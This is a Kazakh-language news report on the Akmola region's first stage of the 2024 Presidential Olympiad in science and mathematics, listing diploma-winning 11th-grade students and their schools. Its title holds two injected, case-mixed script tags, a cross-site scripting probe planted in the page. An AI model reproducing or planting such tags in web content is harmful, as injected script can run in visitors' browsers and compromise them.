Президенттік олимпиаданың бірінші (өңірлік) кезеңінің туралы ақпарат қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.10.2024

Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау жөніндегі орталығы   2024 жылғы 7-9 қазан аралығында Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының базасында Президенттік олимпиаданың бірінші (өңірлік) кезеңі өткізілді. Олимпиадаға бұрын республикалық және халықаралық пәндік олимпиадаларға қатыспаған жаратылыстану-математикалық бағыттағы пәндері бойынша жалпы білім беретін ұйымдардың 11-сынып оқушылары қатысты.

Президенттік олимпиаданың негізгі мақсаттары мен міндеттері:

1) орта білім беру ұйымдарының оқушылары арасында математика, физика, химия және биологиядан дарынды оқушыларды анықтау үшін кәсіптік бағдар мен болашақтағы интеллектуалдық дамуына қолайлы жағдай жасау;

2) жаратылыстану-математикалық бағыттағы пәндерді оқутуда оқушылардың қызығушылығын арттыру, теориялық білімдері мен дағдыларын тереңдету;

3) тұлғаның өзін-өзі жетілдіруіне және дамытуына жағдай жасау.

Президенттік олимпиаданың әрбір қатысушысы барлық кезеңдерде төрт пән бойынша тапсырмаларды орындайды: математика, физика, химия және биология.

Олимпиаданың аудандар, Қосшы, Степногорск және Көкшетау, сондай-ақ дарынды балаларға арналған 5 облыстық мамандандырылған мектеп-интернаттар, ІQanat high school of Burabay қатысты.

Олимпиаданың қорытындысы бойынша І-дәрежелі дипломдармен марапатталды:

1. Куралов Баскар – Ақмола облысы білім басқармасының «Білім-инновация» лицей-интернатының 11-сынып оқушысы;

2. Базарбай Нұрдәулет - Көкшетау қаласы, Мәлік Ғабдуллин атындағы № 3 мамандандырылған гимназиясының 11-сынып оқушысы;

3. Нұран Нұржан – Көкшетау қаласы, Мәлік Ғабдуллин атындағы №3 мамандандырылған гимназиясының 11-сынып оқушысы;

4. Бизат Ерасыл - Аршалы ауданы, Иманжүсіп Құтпанұлы атындағы Жібек жолы ауылының жалпы орта білім беретін мектебінің 11-сынып оқушысы.

ІІ-дәрежелі дипломдармен марапатталды:

1. Темиржанов Мирас – Көкшетау қаласы, №5 «Таңдау» мектеп-гимназиясының 11-сынып оқушысы;

2. Базей Шұғыла – Көкшетау қаласы, Абай атындағы дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 11-сынып оқушысы;

3. Амангелді Эмир – Көкшетау қаласы, №2 мектеп-лицейінің 11-сынып оқушысы;

4. Какешова Каусар – Астана қаласы, №2 "Дарын" облыстық мамандандырылған мектеп-лицей- интернатының 11-сынып оқушысы;

5. Янкова Арина – Сандықтау ауданы, Лесное ауылының жалпы орта білім беретін мектебінің 11-сынып оқушысы;

6. Жуманов Максим - Iqanat High School of Burabay мектебінің 11-сынып оқушысы;

7. Хлыстова Валерия - Ақкөл ауданы, Ақкөл қаласының №2 жалпы орта білім беретін мектебінің 11-сынып оқушысы;

8. Бапан Жәмила - Целиноград ауданы, Қаражар ауылының жалпы орта білім беретін мектебінің 11-сынып оқушысы.

ІІІ-дәрежелі дипломдармен марапатталды:

1. Абдулла Нұрай – Целиноград ауданы, Талапкер ауылының ІТ мектеп-лицейінің11-сынып оқушысы;

2. Михонь Артём – Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 11-сынып оқушысы;

3. Буғыбай Ғабдулла – Ақмола облысы білім басқармасының «Білім-инновация» лицей-интернатының 11-сынып оқушысы;

4. Ыбрайым Қарақат - Iqanat High School of Burabay мектебінің 11-сынып оқушысы;

5. Мұрат Данагүл – Астрахан ауданы, Астрахан ауылыны №1 жалпы орта білім беретін мектебінің 11-сынып оқушысы;

6. Ерке Илья - Ерейментау қаласының Насыр Смағұлов атындағы мектеп-лицейінің 11-сынып оқушысы;

7. Бауржан Расул – Астана қаласы, №2 «Дарын» облыстық мамандандырылған мектеп-лицей-интернатының 11-сынып оқушысы;

8. Қабдуахит Нұрасыл – Есіл қаласының № 3 жалпы орта білім беретін мектебінің 11-сынып оқушысы.

Жеңімпаздар мен жүлдегерлерге екінші (іріктеу) кезеңде сәттілік тілейміз!

Просмотров: 1058


Пікір қосу



Деректерді қолтаңбаға қосу